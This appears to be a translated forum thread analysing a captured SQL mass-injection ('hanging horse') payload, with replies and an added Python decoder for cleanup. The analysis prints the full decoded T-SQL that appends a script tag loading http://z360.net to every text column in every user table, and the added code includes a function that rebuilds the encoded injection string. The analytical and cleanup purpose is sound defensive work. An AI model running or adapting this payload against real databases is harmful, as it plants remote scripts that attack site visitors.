An example of a database "hanging horse" (malicious script injected through SQL)
Today a friend sent me a chunk of data, saying the server had crashed, and asked me to analyse it; the encrypted data is in the attachment. Opening the file, I saw it was separated by %, which is obviously hexadecimal. Converting the hex to a string gave:
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C00610072006500200040005400200056006............ omitted)
This is obviously a SQL "hanging horse" injection. The segment in the middle was still not decoded, but from experience data beginning with 0x is also hex, so I converted it to characters to take a look.

After decoding the middle segment, the final result is:
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(
  Declare @T Varchar(255),@C Varchar(255)
  Declare Table_Cursor Cursor For
    Select A.Name,B.Name From Sysobjects A,Syscolumns B
    Where A.Id=B.Id And A.Xtype='u'
      And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
  Open Table_Cursor
  Fetch Next From Table_Cursor Into @T,@C
  While(@@Fetch_Status=0)
  Begin
    Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')
    Fetch Next From Table_Cursor Into @T,@C
  End
  Close Table_Cursor
  Deallocate Table_Cursor
aS NvArChAR(4000));ExEc(@S);--
The string <script src=http://z360.net></script> was inserted into the database. Googling z360.net shows that a lot of sites have recently been hit by this injection.
A reminder to everyone to watch out for this.

Too deep for me, I don't understand this... learning...

Log is generated by FreShow.
http://z360.net
http://z360.net/0.htm
http://ddyyb.2288.org/fkzd/16.htm  // connection timed out
http://js.tongji.linezing.com/464215/tongji.js

This should be a stored procedure; it uses database cursors. :lol

The code wasn't formatted properly. My skills aren't good enough, reading it like this is really hard work.

This guy is an expert, understanding it even in this form.

I can't learn from this, I can only bow in admiration. Could you provide the original sample?
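The two decoding steps the opening post walks through (the %-separated hex of the request parameter back to text, then the 0x... literal inside CaSt(... aS NvArChAR(4000)) decoded as UTF-16LE, which is why the bytes come in pairs like 44 00 65 00) written out as an added example; this is not code from the original post or from its author. The post's attachment is not available, so the sample request parameter is constructed here from the decoded script shown above, wrapped the same way the captured payload was. The decoder also copes with a truncated literal such as the post's "...56006" fragment by cutting back to whole UTF-16 code units, and pulls out the injected script src so the marker can be searched for in the database. The Xtype values the cursor filters on are the sysobjects/syscolumns type ids for ntext (99), text (35), nvarchar (231) and varchar (167), i.e. every string column in every user table.

```python
"""Decode a two-layer-encoded SQL mass-injection payload (added example)."""
import re

# --- constructed sample ------------------------------------------------------
# Not the attachment from the post: built from the decoded script the post shows
# so the decoder can be exercised offline. The payload, once decoded, loops over
# every user table (A.Xtype='u') and every text-like column
# (B.Xtype 99=ntext, 35=text, 231=nvarchar, 167=varchar) and appends a script tag.
INNER_SQL = (
    "Declare @T Varchar(255),@C Varchar(255) "
    "Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B "
    "Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) "
    "Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C "
    "While(@@Fetch_Status=0) Begin "
    "Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))"
    "+''<script src=http://z360.net></script>''') "
    "Fetch Next From Table_Cursor Into @T,@C End "
    "Close Table_Cursor Deallocate Table_Cursor"
)


def encode_like_attacker(inner_sql: str) -> str:
    """Wrap inner_sql the way the captured payload was wrapped: UTF-16LE hex inside
    CAST(... AS NVARCHAR), then the whole outer statement as %XX hex."""
    nvarchar_hex = inner_sql.encode("utf-16-le").hex().upper()
    outer = (";DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x" + nvarchar_hex
             + " aS NvArChAR(4000));ExEc(@S);--")
    return "".join(f"%{b:02X}" for b in outer.encode("ascii"))


SAMPLE_REQUEST_PARAM = encode_like_attacker(INNER_SQL)  # constructed input

# --- decoder -----------------------------------------------------------------
_PERCENT = re.compile(r"%([0-9A-Fa-f]{2})")
_HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")
_SCRIPT_SRC = re.compile(r"<script\s+src=['\"]?([^'\" >]+)", re.IGNORECASE)


def decode_percent_hex(s: str) -> str:
    """Layer 1: turn %XX sequences back into bytes; literal characters pass through."""
    out = bytearray()
    pos = 0
    for m in _PERCENT.finditer(s):
        out += s[pos:m.start()].encode("latin-1")
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return out.decode("latin-1")


def decode_sql_hex_literal(hex_digits: str) -> str:
    """Layer 2: decode a 0x... literal. NVARCHAR hex is UTF-16LE, so for the ASCII
    T-SQL these kits use every odd byte is 0x00 (heuristic); otherwise treat it
    as single-byte VARCHAR. A truncated literal (odd digit count, like the post's
    '...56006') is cut back to whole bytes / code units instead of raising."""
    hex_digits = hex_digits[: len(hex_digits) - len(hex_digits) % 2]
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        raw = raw[: len(raw) - len(raw) % 2]
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def decode_payload(request_param: str) -> dict:
    """Peel both layers and report what the script would do to the database."""
    outer_sql = decode_percent_hex(request_param)
    inner_sql = " ".join(decode_sql_hex_literal(h) for h in _HEX_LITERAL.findall(outer_sql))
    mass_update = (
        re.search(r"Sysobjects\s+\w+\s*,\s*Syscolumns", inner_sql, re.I) is not None
        and re.search(r"\bupdate\b", inner_sql, re.I) is not None
    )
    return {
        "outer_sql": outer_sql,
        "inner_sql": inner_sql,
        "injected_script_src": _SCRIPT_SRC.findall(inner_sql),  # what to grep the DB for
        "mass_update": mass_update,  # cursor over all user tables/columns + UPDATE
    }


if __name__ == "__main__":
    r = decode_payload(SAMPLE_REQUEST_PARAM)
    print("outer:", r["outer_sql"][:60], "...")
    print("inner:", r["inner_sql"])
    print("injected script src:", r["injected_script_src"])
    print("cursor over sysobjects/syscolumns + UPDATE:", r["mass_update"])
```

Once the inner script is recovered, the injected_script_src list is what to search every text column for when cleaning up; because the payload appends rather than overwrites, a REPLACE of that exact tag with an empty string restores the original column value.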